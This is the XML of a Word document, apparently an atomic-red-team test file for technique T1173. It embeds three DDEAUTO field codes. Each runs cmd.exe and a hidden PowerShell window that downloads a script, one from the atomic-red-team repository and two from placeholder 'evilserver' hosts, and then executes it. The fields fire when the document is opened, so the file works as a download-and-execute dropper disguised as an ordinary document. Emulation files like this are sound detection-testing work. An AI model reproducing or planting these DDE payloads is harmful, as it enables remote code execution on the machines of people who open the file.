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4CB" w:rsidRDefault="0061022B">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="001F46C4" w:rsidRPr="001F46C4">
        <w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/</w:instrText>
      </w:r>
      <w:r w:rsidR="00FC7BC7" w:rsidRPr="00FC7BC7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00FC7BC7" w:rsidRPr="00FC7BC7">
        <w:instrText>redcanaryco</w:instrText>
      </w:r>
      <w:r w:rsidR="001F46C4" w:rsidRPr="001F46C4">
        <w:instrText>/atomic-red-team/T1173-Execute-PowerShell-Script-via-Word-</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="001F46C4" w:rsidRPr="001F46C4">
        <w:instrText>DDE/atomics/T1173/src/PowerShell_Script_For_DDE_Document.ps1');powershell -e $e "</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40334" w:rsidRPr="00D40334">
        <w:instrText>System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.</w:instrText>
      </w:r>
      <w:r w:rsidR="0058379E">
        <w:instrText>asdfasfd</w:instrText>
      </w:r>
      <w:r w:rsidR="0058379E" w:rsidRPr="00D40334">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40334" w:rsidRPr="00D40334">
        <w:instrText>/pp.ps1');powershell -e $e "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A06E3F" w:rsidRPr="00A06E3F">
        <w:instrText>{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.nja/pp.ps1');powershell -e $e "}</w:instrText>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008E5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24"/>
    <w:rsid w:val="001F46C4"/>
    <w:rsid w:val="00443B24"/>
    <w:rsid w:val="004E516D"/>
    <w:rsid w:val="0058379E"/>
    <w:rsid w:val="005E53D6"/>
    <w:rsid w:val="0061022B"/>
    <w:rsid w:val="008916A7"/>
    <w:rsid w:val="008E54CB"/>
    <w:rsid w:val="00A06E3F"/>
    <w:rsid w:val="00AE59F9"/>
    <w:rsid w:val="00D40334"/>
    <w:rsid w:val="00FC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B2B6A-A2C2-416B-A482-0981E51B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2019-11-11T22:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-11T23:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>